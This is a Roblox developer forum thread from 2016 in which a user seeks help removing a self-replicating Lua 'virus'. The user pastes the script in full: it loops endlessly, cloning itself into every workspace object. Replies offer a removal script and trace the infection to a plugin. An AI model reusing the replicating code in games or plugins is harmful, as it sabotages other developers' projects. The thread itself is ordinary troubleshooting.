of     1   

JiggIypuffs
#183465097Saturday, February 13, 2016 12:06 AM GMT

I've encountered a virus that is very dangerous. I haven't been able to find a work-a-round around it, i've used several plugins but they don't help. This virus is, despite all this, easy to remove. It's detected by all anti-viruses, but what makes it super is that it comes back the second you remove it. ROBLOX Studio isn't even running. The scripts aren't running, its not on play, yet it reproduces like this. Here's the script: function spread() -- ChevroletSonic123 local stuff = game.Workspace:GetChildren() for i = 1, #stuff do if (stuff[i].className ~= "Script") and (stuff[i]:findFirstChild("Vaccine") == nil) and (stuff[i].className ~= "Camera") then local clone = script:clone() clone.Parent = stuff[i] end end end while true do wait(.1) spread() end function GetAllItems(mdl) local objs = {} function Search(obj) if obj~=workspace then table.insert(objs,obj) end if #obj:GetChildren() > 0 then for i, v in ipairs(obj:GetChildren()) do Search(v) end end end Search(mdl) return objs end If anyone can come up with some sorta anti-virus, help! ~One Jigglypuff to Top Them All!
DeepBlueNoSpace
#183465524Saturday, February 13, 2016 12:13 AM GMT

How is it different to a usual virus?
JarodOfOrbiter
#183466062Saturday, February 13, 2016 12:20 AM GMT

Why are you running the game while trying to remove it? It won't come back if you remove it before you run the game.
JiggIypuffs
#183507513Saturday, February 13, 2016 3:37 PM GMT

It's different because unlike other viruses, it duplicates itself without studio on play. Also, I'm NOT running studio. The scripts aren't running, but it's duplicating. ~One Jigglypuff to Top Them All!
awesomeadda
#183530836Saturday, February 13, 2016 9:02 PM GMT

just backup to previus verision
TimeTicks
#183530989Saturday, February 13, 2016 9:04 PM GMT

Don't use free mods. Just use the command prompt to delete it. Duh
JarodOfOrbiter
#183531174Saturday, February 13, 2016 9:07 PM GMT

You aren't using Studio nor playing the game and it still duplicates? That's for the most part impossible. Check your plugins, one of them may be a virus.
TimeTicks
#183531402Saturday, February 13, 2016 9:10 PM GMT

killVirus = function(location,name) for i,v in next, location:GetChildren() do if v.Name == name then v:Destroy() end killVirus(v,name) end end killVirus(game,"Virus")
JiggIypuffs
#183548834Sunday, February 14, 2016 1:11 AM GMT

Just to get things straight: I'm using ROBLOX Studio. ROBLOX Studio is not running (Meaning I didn't press the green "Run" button that runs scripts.) It's also a linked script. ~One Jigglypuff to Top Them All!
JiggIypuffs
#183548932Sunday, February 14, 2016 1:12 AM GMT

Apparently, it was one of my plugins! Thanks guys! ~One Jigglypuff to Top Them All!

    of     1